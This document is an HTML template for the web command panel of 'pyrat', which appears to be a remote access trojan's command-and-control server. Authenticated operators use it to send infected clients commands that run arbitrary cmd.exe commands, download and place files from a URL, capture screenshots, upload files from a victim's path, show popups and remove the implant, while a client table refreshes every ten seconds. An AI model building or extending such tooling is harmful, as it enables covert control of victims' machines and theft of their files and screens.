<!DOCTYPE html>

<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>:: pyrat :: command center</title>
    <style> td, th { border: 1px solid black; } </style>
    <script src="https://code.jquery.com/jquery-latest.pack.js" type="text/javascript"></script>
</head>

<body>
{% if user.is_authenticated %}
    <script language="javascript" type="text/javascript">
       $('document').ready(function(){
       setInterval(function(){
        $.ajax({
          url: "/clients/ #table_cont",
        }).done(function ( data ) {
          $("#fresh_table_cont").html(data);

        });
        }, 10000);
        });
    </script>
    <div align="right">
    Logged user: <b>{{ user.username }}</b> // <a href="/accounts/logout/">LOGOUT</a>
    </div>
    <div align="center" id="logo">
<pre>
 .----------------.  .----------------.  .----------------.  .----------------.  .----------------.
| .--------------. || .--------------. || .--------------. || .--------------. || .--------------. |
| |   ______     | || |  ____  ____  | || |  _______     | || |      __      | || |  _________   | |
| |  |_   __ \   | || | |_  _||_  _| | || | |_   __ \    | || |     /  \     | || | |  _   _  |  | |
| |    | |__) |  | || |   \ \  / /   | || |   | |__) |   | || |    / /\ \    | || | |_/ | | \_|  | |
| |    |  ___/   | || |    \ \/ /    | || |   |  __ /    | || |   / ____ \   | || |     | |      | |
| |   _| |_      | || |    _|  |_    | || |  _| |  \ \_  | || | _/ /    \ \_ | || |    _| |_     | |
| |  |_____|     | || |   |______|   | || | |____| |___| | || ||____|  |____|| || |   |_____|    | |
| |              | || |              | || |              | || |              | || |              | |
| '--------------' || '--------------' || '--------------' || '--------------' || '--------------' |
 '----------------'  '----------------'  '----------------'  '----------------'  '----------------'
</pre>
    </div>
    <br>
	Insert params
	<br>
    <br>
	<input type ="text" name="params" size="100" id="params">
	<br>
    <br>
	Select command:
	<form action="/command/" method="post" target="_blank" id="kurwa">
	<input type="hidden" name="command" size="100" id="command"> 
	<br>
	<br>
	<input type="image" id="#deluser" src="/static/pyrat_server/img/delete.png" alt="submit Button" hspace="20" title="#deluser"
           onMouseOut="this.src='/static/pyrat_server/img/delete.png'" onMouseOver="this.src='/static/pyrat_server/img/delete_bl.png'">
	<input type="image" id="#popup" src="/static/pyrat_server/img/popup.png" alt="submit Button" hspace="20" title="#popup($Title,$Text)"
           onMouseOut="this.src='/static/pyrat_server/img/popup.png'" onMouseOver="this.src='/static/pyrat_server/img/popup_bl.png'">
	<input type="image" id="#run_command" src="/static/pyrat_server/img/command.png" alt="submit Button" hspace="20" title="#run_command($C:\windows\system32\cmd.exe,$/C,$Command,$Param) [use \\ for slash]"
           onMouseOut="this.src='/static/pyrat_server/img/command.png'" onMouseOver="this.src='/static/pyrat_server/img/command_bl.png'">
	<input type="image" id="#downloader" src="/static/pyrat_server/img/downloader.png" alt="submit Button" hspace="20" title="#downloader($Url,$Path,$Y)"
           onMouseOut="this.src='/static/pyrat_server/img/downloader.png'" onMouseOver="this.src='/static/pyrat_server/img/downloader_bl.png'">
	<input type="image" id="#screenshot" src="/static/pyrat_server/img/screenshot.png" alt="submit Button" hspace="20" title="#screenshot()"
           onMouseOut="this.src='/static/pyrat_server/img/screenshot.png'" onMouseOver="this.src='/static/pyrat_server/img/screenshot_bl.png'">
	<input type="image" id="#upload" src="/static/pyrat_server/img/upload.png" alt="submit Button" hspace="20" title="#upload($Path)"
           onMouseOut="this.src='/static/pyrat_server/img/upload.png'" onMouseOver="this.src='/static/pyrat_server/img/upload_bl.png'">
        <br>
        <br>
        <div id="fresh_table_cont"></div>
    </form>
	<script type="text/javascript">
	$(document).ready(function(){
	$('input').click(function(e){
	if  (e.target.id != 'params') {
		if (e.target.id == '#screenshot' || e.target.id =='#deluser') {
		var idClicked = e.target.id;
		var suma = idClicked + '()';
		}
		else {
		var idClicked = e.target.id;
		var params = $('#params').val();
			if (params.length == 0) {
			alert('For command != screenshot or deluser, you must put some params!');
			e.preventDefault();
			}
			else {
			}
		var suma = idClicked + '(' + params + ')';
		}
	}
	else {
	var suma = '';
	}
    $('#command').val(suma);
    });
    });
	</script>
{% else %}
    User not authenticated.
    <br>
    <a href="/accounts/login/">CLICK TO LOGIN</a>
{% endif %}
</body>

</html>